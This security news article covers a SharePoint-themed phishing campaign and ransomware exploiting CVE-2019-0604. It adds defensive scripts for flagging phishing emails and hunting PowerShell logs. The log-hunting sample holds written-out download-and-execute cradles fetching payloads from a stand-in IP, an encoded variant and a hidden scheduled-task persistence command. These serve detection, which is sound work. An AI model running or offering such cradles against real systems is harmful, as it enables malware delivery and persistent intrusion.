A phishing campaign, discovered by researchers at Cofense, is draping itself in a Microsoft Office SharePoint theme and successfully bypassing secure email gateways (SEGs). In a post on Tuesday, the firm said that this is an example of why it’s not always prudent to share documents via Microsoft’s widely used SharePoint collaboration platform.
The phish is targeting Office 365 users with a legitimate-looking SharePoint document that claims to urgently need an email signature. The campaign cropped up in a spot that’s supposed to be protected by Microsoft’s own SEG. This isn’t the first time that we’ve seen the SEG sanctuary get polluted: In December, spearphishers spoofed Microsoft.com itself to target 200 million Office 365 users, successfully slipping past SEG controls due to Microsoft’s reported failure to enforce Domain-based Message Authentication, Reporting & Conformance (DMARC), an email authentication protocol that builds on SPF and DKIM specifically to stop exact-domain spoofing.
As this image of the text in the phishing email shows, the spelling and grammar used in the booby-trapped message aren’t the most egregious, atrociously spelled, syntactically bizarre giveaways you can find in these kinds of phishing campaigns. But then again, it’s probably safe to assume that any SharePoint message that asks you to “response urgently” isn’t coming from a native speaker.
The mere fact that the message presses urgency on its recipients should be a tip-off, of course: “Rush-rush” is a typical phishing ploy. Cofense notes that other red flags include the fact that the user’s name isn’t apparent in the opening message: an indication that it’s a mass-distribution campaign intended to reach many targets.
Also, when recipients hover over the hyperlink, they’ll see neither hide nor hair of any reference to Microsoft. Those who click on the link will instead be shuffled over to the landing page shown below, which displays Microsoft’s SharePoint logo and the “Pending file” notification in front of a blurry background and a request for the intended victim to log in to view the document. That “could suffice for threat actors to extract and harvest users’ personal data,” Cofense says. If and when credentials are handed over, the campaign redirects the user to a spoofed, unrelated document, “which might be enough to trick the user into thinking this is a legitimate transaction,” Cofense says.
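The red flags Cofense lists (urgency, a body that never names the recipient, a hover-over link whose host has nothing to do with Microsoft, anchor text that says SharePoint while pointing elsewhere) are straightforward to check mechanically at the mail filter or during triage. The Python script below is an added example, not Cofense’s or Microsoft’s tooling: it parses a constructed SharePoint-themed lure, collects every hyperlink from the HTML body, and reports which of those flags the message trips. The allowlist of Microsoft domains, the sample messages and the sender domains are all assumptions made for the example.

```python
"""Mechanical red-flag checks for a SharePoint-themed lure.

Added example, not Cofense's or Microsoft's tooling. The allowlist, the
sample messages and the sender domains are assumptions made for the example.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: a genuine SharePoint share link lands on one of these suffixes.
TRUSTED_SUFFIXES = ("sharepoint.com", "microsoft.com", "office.com")
URGENCY = re.compile(r"\b(urgent(ly)?|immediately|asap|right away|within 24 hours)\b", re.I)
LURE_WORDS = re.compile(r"sharepoint|microsoft|office 365|onedrive", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, anchor text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_is_trusted(url):
    """True if the link's host is an allowlisted suffix or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def red_flags(raw_message, recipient_name):
    """Return the red flags raised by one RFC 822 message; an empty list means none."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body is not None else ""
    collector = LinkCollector()
    collector.feed(html)
    text = re.sub(r"<[^>]+>", " ", html)           # crude tag strip for keyword checks

    flags = []
    if URGENCY.search(text) or URGENCY.search(str(msg.get("Subject", ""))):
        flags.append("urgency")
    if recipient_name.lower() not in text.lower():  # mass mailing: body never names the user
        flags.append("no-personalisation")
    for href, anchor in collector.links:
        if not host_is_trusted(href):               # what hovering over the link would reveal
            flags.append("untrusted-link:" + (urlparse(href).hostname or "?"))
            if LURE_WORDS.search(anchor):           # says SharePoint, points elsewhere
                flags.append("lure-mismatch")
    return flags


# Constructed sample: the lure described in the article, paraphrased.
LURE = """\
From: SharePoint Online <no-reply@notifications.example.net>
To: Alice Example <alice@example.org>
Subject: Pending file: e-signature required
Content-Type: text/html; charset=utf-8

<html><body>
<p>Hi,</p>
<p>A document is pending your e-signature. Please response urgently.</p>
<p><a href="http://sharepoint-files.example.net/pending">Open in SharePoint</a></p>
</body></html>
"""

# Constructed sample: a genuine-looking internal share for comparison.
BENIGN = """\
From: Bob Example <bob@example.org>
To: Alice Example <alice@example.org>
Subject: Q2 budget draft
Content-Type: text/html; charset=utf-8

<html><body>
<p>Hi Alice,</p>
<p>Here is the draft we discussed; no rush.</p>
<p><a href="https://contoso.sharepoint.com/sites/finance/Q2-budget.xlsx">Q2-budget.xlsx</a></p>
</body></html>
"""

if __name__ == "__main__":
    for name, sample in (("lure", LURE), ("benign", BENIGN)):
        print(name, red_flags(sample, "Alice"))
```

The host allowlist only catches the hover-over mismatch the article describes; a lure hosted on a real tenant under sharepoint.com passes that check, so treat the output as a triage aid rather than a verdict.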
In its X-Force Threat Activity Report, IBM labelled the phish a high-risk threat and gave these recommendations:
- Ensure anti-virus software and associated files are up to date.
- Search for existing signs of the indicated indicators of compromise (IoCs) in your environment.
- Consider blocking and/or setting up detection for all URL and IP based IoCs.
- Keep applications and operating systems running at the current released patch level.
- Exercise caution with attachments and links in emails.
Though it’s high risk, this phishing campaign is basically just another story of a malicious actor putting up bogus material that looks legitimate in order to lure users into clicking, in the hopes of obtaining credentials. Don’t shrug it off, though: it’s yet another attack involving SharePoint servers, which have now joined the roster of internet-facing systems – including much-bedeviled Microsoft Exchange email servers, SonicWall gateways and Pulse Secure gateways – that are being used by ransomware gangs to jimmy open enterprise networks.
Which brings us to ransomware: the second slap in the double-SharePoint whammy:
Ransomware Gang Pings the Pain Via Wickr
It’s a fairly new variant, first spotted in January by Pondurance. Analysts are calling it by two names: Hello, since some samples use .hello as an extension; or WickrMe, since the gang that’s pushing it is using the Wickr encrypted instant messaging service to try to shake down victims for ransom.
The attackers are using a dusty SharePoint vulnerability from 2019 (CVE-2019-0604) to pry their way into victims’ networks. From there, they’re using Cobalt Strike to pivot to the domain controller and launch ransomware attacks.
CVE-2019-0604 is a high-severity CVE that can lead to remote code execution. Microsoft patched the flaw in March 2019, but nonetheless, there seems to be no end to the attacks that have used it to penetrate unpatched servers since then. One example: Microsoft warned in October 2020 that Iranian nation-state actors were using CVE-2019-0604 to remotely exploit unpatched servers and then implant a web shell to gain persistent access and code execution. The ransomware intrusions follow the same opening moves: after the web shell is installed, the attacker deploys Cobalt Strike – a commercially available penetration-testing tool – and uses it to install a backdoor that runs automated PowerShell scripts, which eventually download and install the final payload: the Hello/WickrMe ransomware.
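The chain described above ends with automated PowerShell that fetches and installs the payload, which is the stage most visible in logs when script-block logging (PowerShell operational log, event ID 4104) is enabled. The Python script below is an added example, not code from Pondurance, Microsoft or any other report cited in the article: it runs a small set of indicator patterns over constructed script-block records, decodes -EncodedCommand arguments so a cradle hidden inside them is matched as well, and returns which records tripped which indicators. The sample records, the indicator list and the 198.51.100.7 address are constructed for the example.

```python
"""Hunt for the PowerShell download-and-execute stage in script-block logs.

Added example, not code from any report cited in the article. The records,
the indicator list and the 198.51.100.7 address are constructed for the example.
"""
import base64
import re

# Assumption: each record is the ScriptBlockText of one PowerShell operational
# log event (ID 4104), exported one per line.
INDICATORS = {
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "invoke-expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
    "scheduled-persistence": re.compile(r"schtasks|Register-ScheduledTask|New-Service", re.I),
}
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script inside).
ENCODED = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(script_block):
    """Return the script hidden in an -EncodedCommand argument, or None if there is none."""
    m = ENCODED.search(script_block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(3)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # base64-looking token that is not a command
        return None


def classify(script_block):
    """Return the indicator names tripped by one record, matching the decoded form too."""
    decoded = decode_encoded_command(script_block)
    haystack = script_block if decoded is None else script_block + " " + decoded
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(haystack)]
    if decoded is not None:
        hits.append("encoded-command")
    return hits


def hunt(records):
    """Return (record number, hits) for every record that tripped at least one indicator."""
    findings = []
    for number, record in enumerate(records, 1):
        hits = classify(record)
        if hits:
            findings.append((number, hits))
    return findings


# Constructed records. The third one is encoded here the same way an attacker's
# tooling would encode it, so the block has a real -Enc argument to decode.
STAGE2_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadFile("
                 "'http://198.51.100.7/p.exe','C:\\Windows\\Temp\\p.exe')")
STAGE2_ENC = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_RECORDS = [
    r"Get-ChildItem C:\Users\alice\Documents -Recurse | Measure-Object",
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.7/stage.ps1')\"",
    "powershell.exe -NoP -NonI -W Hidden -Enc " + STAGE2_ENC,
    r'schtasks /create /tn Updater /tr "powershell -w hidden -File C:\ProgramData\u.ps1" /sc minute /mo 5',
]

if __name__ == "__main__":
    for number, hits in hunt(SAMPLE_RECORDS):
        print(number, ", ".join(hits))
```

The decoder only handles the plain -EncodedCommand form; stages that are additionally compressed or string-obfuscated need the decoded text fed back through the same classifier, and none of this is visible unless script-block logging is switched on before the intrusion.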
Jeff Costlow, CISO of ExtraHop, told Threatpost on Wednesday that the ransomware attacks exploiting the 2019 vulnerability in SharePoint servers are the more insidious threat in the double whammy, in that they install remote-control software and thus allow direct access to the infrastructure, where attackers can freely frolic.
“The common thread is the SharePoint server,” Costlow said in an email. “Anyone using SharePoint needs to ensure that they are patching any instances of SharePoint to avoid the malware/ransomware installations. Long term, no amount of patching will solve the phishing problem. It’s too easy for attackers to build sites that mimic legitimate sites. We need to rethink how sharing is done. Security teams need to take a proactive stance to help their users conduct business safely. There are various tactics to help alert users to possible attacks, such as setting up each SharePoint server to use a familiar background or image for users to ensure that they only input credentials on legitimate sites.”
Two Separate SharePoint Jabs
Cofense told Threatpost in an email on Wednesday morning that there’s no apparent connection between the SharePoint phishing campaign that its analysts uncovered and the Wickr/Hello ransomware gang’s ongoing exploitation of SharePoint server vulnerabilities.
But one expert noted that there’s a monotonous regularity in the pattern that these attacks follow: First we get the news about a vulnerability, then it gets jumped on by attackers looking for the sitting ducks of unpatched servers.
In an email to Threatpost on Wednesday, Avihai Ben-Yossef, CTO and co-founder of Cymulate, said that we’ve seen this happen over and over. “In the last year, we see a repetitious pattern in such attacks. A zero-day is taken advantage of by a nation-state actor,” he said. “The affected company – in this case, Microsoft – announces the vulnerability and subsequently patches it. Then other nation-state actors learning about the vulnerability subsequently launch attacks on those who have not patched. Finally, the criminal ransomware attackers come in, socialize the exploit on Dark Net sites and use it … to launch their own attacks. The double-SharePoint whammy is the fact that nation state actors used it first as a zero day (and then as a known vulnerability). Then ransomware actors came in and used it as well.
“The idea is to know what kind of problems you have and where,” he said. “If you don’t know, you can’t protect yourself. Organizations must develop a better response capability to track these announcements and threat intelligence and patch quicker.”